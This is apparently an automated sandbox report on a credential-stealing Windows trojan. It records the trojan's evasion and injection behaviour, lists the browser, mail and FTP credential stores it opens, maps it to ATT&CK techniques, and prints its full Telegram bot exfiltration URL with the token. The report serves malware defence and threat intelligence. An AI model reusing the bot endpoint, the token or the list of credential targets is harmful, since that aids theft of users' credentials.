Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, aX1L9ZdT0YTnGGVqLfb.cs | High entropy of concatenated method names: 'WIwdx7ZVUF', 'ArkdCRc2ZY', 'CysdS5CJl4', 'JnOdJK8bUE', 'zjadANr8ZU', 'LT6dzHCTVY', 'mgtmfhB6HK', 'ttVmb8TbeW', 'vMamh3Yx7C', 'GcxmOV2YxH'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, imGtPFK9EYwyvmpx65q.cs | High entropy of concatenated method names: 'BtYywKLIZF', 'IydyNHiMlZ', 'hi1yusD1r8', 'mdxHMX8ay7s2r893ekH', 'L5xo2T8lgV47WyWx3xr', 'vpxKXe4J7V', 'GVxKJqX6Eq', 'bgfKAy818Z', 'Q4kKzmwGSW', 'vaWyfH5jSM'

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara match, file source: Process Memory Space: xnlP06YunJ.exe PID: 6616, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: 1A70000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: 33A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: 31A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: D90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: 2830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: 4830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Thread delayed: delay time (52 entries, in order): 922337203685477, 600000, 599891, 599781, 599672, 599562, 599453, 599344, 599234, 599125, 599015, 598906, 598797, 598687, 598578, 598455, 598328, 598197, 598094, 597984, 597868, 597747, 597639, 597530, 597412, 597281, 597172, 597047, 596937, 596828, 596719, 596594, 596484, 596375, 596265, 596156, 596046, 595937, 595828, 595719, 595609, 595500, 595375, 595226, 595057, 594873, 594764, 594651, 594547, 594436, 594328, 594219
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Window / User API: threadDelayed 1727
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Window / User API: threadDelayed 8106
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe TID: 6180 Thread sleep time (52 entries, each reported as >= -30000s, in order): -29514790517935264s, -600000s, -599891s, -599781s, -599672s, -599562s, -599453s, -599344s, -599234s, -599125s, -599015s, -598906s, -598797s, -598687s, -598578s, -598455s, -598328s, -598197s, -598094s, -597984s, -597868s, -597747s, -597639s, -597530s, -597412s, -597281s, -597172s, -597047s, -596937s, -596828s, -596719s, -596594s, -596484s, -596375s, -596265s, -596156s, -596046s, -595937s, -595828s, -595719s, -595609s, -595500s, -595375s, -595226s, -595057s, -594873s, -594764s, -594651s, -594547s, -594436s, -594328s, -594219s
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (identical query recorded 5 times)
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (recorded 2 times)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Thread delayed: delay time (52 entries, listed a second time in the report, in order): 922337203685477, 600000, 599891, 599781, 599672, 599562, 599453, 599344, 599234, 599125, 599015, 598906, 598797, 598687, 598578, 598455, 598328, 598197, 598094, 597984, 597868, 597747, 597639, 597530, 597412, 597281, 597172, 597047, 596937, 596828, 596719, 596594, 596484, 596375, 596265, 596156, 596046, 595937, 595828, 595719, 595609, 595500, 595375, 595226, 595057, 594873, 594764, 594651, 594547, 594436, 594328, 594219
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q 1:en-CH:Microsoft|VMWare|Virtual
                  Source: xnlP06YunJ.exe, 00000004.00000002.2107022086.0000000000C16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Process token adjusted: Debug (recorded 2 times)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Memory written: C:\Users\user\Desktop\xnlP06YunJ.exe base: 900000 value starts with: 4D5A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Users\user\Desktop\xnlP06YunJ.exe VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Users\user\Desktop\xnlP06YunJ.exe VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
Source: Yara match | File source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
MITRE ATT&CK Matrix, listed per tactic (the number in parentheses is the badge the report shows next to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (131); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: DLL Side-Loading (1); Process Injection (111); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1); Virtualization/Sandbox Evasion (161); Process Injection (111)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery (1); System Information Discovery (34); Security Software Discovery (231); Process Discovery (1); Virtualization/Sandbox Evasion (161); Application Window Discovery (1); System Network Configuration Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1632360, Sample: xnlP06YunJ.exe, Start date: 07/03/2025, Architecture: WINDOWS, Score: 100)

Contacted hosts:
api.telegram.org: 149.154.167.220, 443, 49683, 49691, TELEGRAMRU, United Kingdom (signature: Uses the Telegram API (likely for C&C communication))
api.ipify.org: 104.26.13.205, 443, 49682, CLOUDFLARENETUS, United States

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 9 other signatures

Process tree:
xnlP06YunJ.exe (started)
    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Injects a PE file into a foreign processes
    xnlP06YunJ.exe (started; connects to api.telegram.org and api.ipify.org)
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    cmd.exe (started)
        signatures: Uses ipconfig to lookup or modify the Windows network settings
        conhost.exe (started)
        ipconfig.exe (started)
    cmd.exe (started)
        conhost.exe (started)
        ipconfig.exe (started)

Antivirus detection of the submitted file (Source | Detection | Scanner | Label):
xnlP06YunJ.exe | 72% | Virustotal
xnlP06YunJ.exe | 61% | ReversingLabs | Win32.Trojan.Leonem
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Reputation):
api.ipify.org | 104.26.13.205 | true | false | high
api.telegram.org | 149.154.167.220 | true | false | high

Contacted URLs (Name | Malicious | Reputation):
https://api.ipify.org/ | false | high
https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument | false | high
URLs found in memory or binary data (Name | Source | Malicious | Reputation):
https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/ | xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.ipify.org | xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/mgravell/protobuf-neti | xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://stackoverflow.com/q/14436606/23354 | xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://account.dyn.com/ | xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org | xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/mgravell/protobuf-netJ | xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://stackoverflow.com/q/11564914/23354; | xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://stackoverflow.com/q/2152978/23354 | xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://github.com/StefH/System.Linq.Dynamic.Core/issues/358 | xnlP06YunJ.exe | false | high
https://github.com/mgravell/protobuf-net | xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp | false | high
https://github.com/mono/linker#link-xml-file-examples | xnlP06YunJ.exe | false | high
https://api.ipify.org/t | xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp | false | high
http://api.telegram.org | xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/mono/mono/issues/12917 | xnlP06YunJ.exe | false | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632360
Start date and time: 2025-03-07 22:49:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xnlP06YunJ.exe (renamed because the original name is a hash value)
Original Sample Name: 3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/0@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 177
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.16.185.191
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
• Execution Graph export aborted for target xnlP06YunJ.exe, PID 524 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Simulations (Time | Type | Description):
16:51:05 | API Interceptor | 761642x Sleep call for process: xnlP06YunJ.exe modified
Joe Sandbox context, by IP (Match: Associated Sample Name / URL | Detection | Threat Name | Context):

Match: 149.154.167.220
cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger
axN56TZ3PI.exe | malicious | GuLoader, Snake Keylogger
bvhauD4o49.exe | malicious | GuLoader, Snake Keylogger
0CBJ3aLKx0.exe | malicious | Snake Keylogger, VIP Keylogger
